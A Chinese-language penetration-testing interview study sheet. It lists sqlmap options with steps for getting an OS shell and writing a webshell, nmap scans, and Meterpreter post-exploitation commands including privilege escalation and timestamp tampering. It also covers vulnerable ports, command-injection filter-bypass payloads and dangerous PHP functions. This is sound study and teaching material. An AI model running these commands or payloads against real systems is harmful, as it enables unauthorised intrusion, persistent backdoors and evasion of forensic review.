渗透测试面试总结【工具与杂项篇】
-
- 1.SQLmap
- 2.Nmap
- 3.MSF
- 4.了解那些端口
- 5.命令执行怎么绕过
- 6.文件包含都有哪些伪协议?
- 7.代码执行,文件读取,命令执行的函数都有哪些?
1.SQLmap
1-SQLmap 是最强大的注入工具,没有之一,几乎所有的数据库都可以注入
--is-dba
--dbs
--current-db
--users
--current-user
--random-agent
--passwords
--proxy http://local:8080 –threads 10
--time-sec=TIMESEC DBMS
--threads=
--batch
sqlmap.py -u "http://www.xxx.com?id=1注入点" --cookie="cookie值" --current-db
sqlmap -r “数据包地址” -p “需要制定的参数” –dbms 需要制定的数据类型
sqomap -u “注入点地址” --dbs 跟上你需要的参数
1-前提条件:最高权限、知道web网站绝对路径、能获取到cookie
2- sqlmap.py -u "注入点地址" --cookie="cookie值" --os-shell
2.1-echo “一句话木马”>网站的绝对路径
3- 输入web网站的绝对路径
4-传木马
2.Nmap
nmap www.baidu.com
nmap 192.168.1.154
nmap 192.168.1.1/24
nmap 192.168.1.154 192.168.1.156
nmap 192.168.1.1-100
nmap -iL target.txt
nmap 192.168.1.1/24 -exclude 192.168.1.1
nmap 192.168.1.1/24 -exclude file xxx.txt
nmap -p80,21,23 192.168.1.154
nmap -sS 192.168.1.1
namap --script==vuln
namp -oN
3.MSF
background
sessions -i number
quit
shell
cat c:\\boot.ini
getwd
upload /root/Desktop/netcat.exe c:\\
download 0xfa.txt /root/Desktop/
edit c:\\boot.ini
search -d d:\\www -f web.config
ps
migrate pid
execute -H -i -f cmd.exe
getpid
kill pid
getuid
sysinfo
getsystem
timestompc:/a.doc -c "10/27/2015 14:22:11"
1-meterpreter > ps
2-自行选择PID
3-meterpreter > migrate pid
还可以做免杀木马等等。。。。MSF 蛮强大的
4.了解那些端口
80 web
80-89 web
8000-9090 web
1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL
50000 DB2
443 SSL心脏滴血
445 ms08067/ms11058/ms17010等
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问
21 ftp
22 SSH
23 Telnet
445 SMB弱口令扫描
2601,2604 zebra路由,默认密码zebra
3389 远程桌面
5.命令执行怎么绕过
cat 233.txt
${IFS}
< <>
@kali:$ a=c;b=at;c=fl;d=ag;$a$b $c$d
ca''t flag
cat"" flag
$(printf "\154\163")
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容
c\at fl\ag
echo "m0re`cat flag`"
echo "m0re $(cat flag)"
# base64编码绕过
`echo "Y2F0IGZsYWc="|base64 -d`
echo '123'>xxoo.txt
echo '233'>>xxoo.txt
ca\
a\
t\
fl\
ag
6.文件包含都有哪些伪协议?
file:// 访问本地文件系统
http:// 访问 HTTPs 网址
ftp:// 访问 ftp URL
Php:// 访问输入输出流
Zlib:// 压缩流
Data:// 数据
Ssh2:// security shell2
Expect:// 处理交互式的流
Glob:// 查找匹配的文件路径
7.代码执行,文件读取,命令执行的函数都有哪些?
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()